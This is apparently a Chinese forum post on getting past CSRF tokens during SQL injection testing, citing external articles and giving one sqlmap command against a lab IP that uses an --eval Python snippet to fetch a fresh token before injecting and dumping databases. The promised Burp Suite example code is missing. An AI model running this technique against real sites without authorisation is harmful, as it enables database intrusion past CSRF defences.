|
阅读:2292回复:0
用Burpsuite 来处理csrf token
from: http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-1/
http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-2/ 问题:http://drops.wooyun.org/tips/2444 附加其他案例(--eval): https://gist.github.com/McSimp/2602fd7ee7203e34268b 当在测试某些网站注入时我们会遇到token,只能手工或者写工具之后进行自动化处理,就sqlmap和burpsuite而言各有各的方法。 Sqlmap如下: CGY@Hank-PC /pentest/databases/sqlmap
$ python sqlmap.py -u "http://192.168.83.117/2.php" --data="token=123&id=root" --eval="import urllib2;import re;a=urllib2.build_opener();a.addheaders.append(('Cookie', 'PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05'));token=re.search(r'w{32}',a.open('http://192.168.83.117/2.php').read()).group(0);print token;" -p id --dbs --cookie="PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05" --current-userBurpsuite如下: 在burpsuite 里提供了一个session handler 机制,可以让我们更好的去自动化处理这些。 事例代码如下: #!php |
|
